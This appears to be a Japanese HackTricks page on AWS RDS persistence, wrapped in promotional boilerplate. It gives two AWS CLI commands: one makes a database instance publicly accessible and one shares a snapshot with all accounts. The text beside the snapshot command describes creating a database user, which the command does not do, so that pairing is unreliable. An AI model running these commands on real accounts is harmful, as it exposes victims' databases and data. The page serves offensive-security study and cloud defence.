AWS - RDS Persistence

HackTricksをサポートする

サブスクリプションプランをチェック！
**💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローする。
ハッキングトリックを共有するには、HackTricksおよびHackTricks CloudのgithubリポジトリにPRを提出する。

RDS

詳細については以下を参照してください:

この権限を持つ攻撃者は、既存のRDSインスタンスを変更して公開アクセスを有効にすることができます。

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

攻撃者はDB内にユーザーを作成することで、マスターユーザーのパスワードが変更されてもデータベースへのアクセスを失わないようにすることができます。

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

HackTricksをサポートする

サブスクリプションプランをチェック！
💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローする。
PRを提出してHackTricksおよびHackTricks Cloudのgithubリポジトリでハッキングトリックを共有する。

Last updated 1 month ago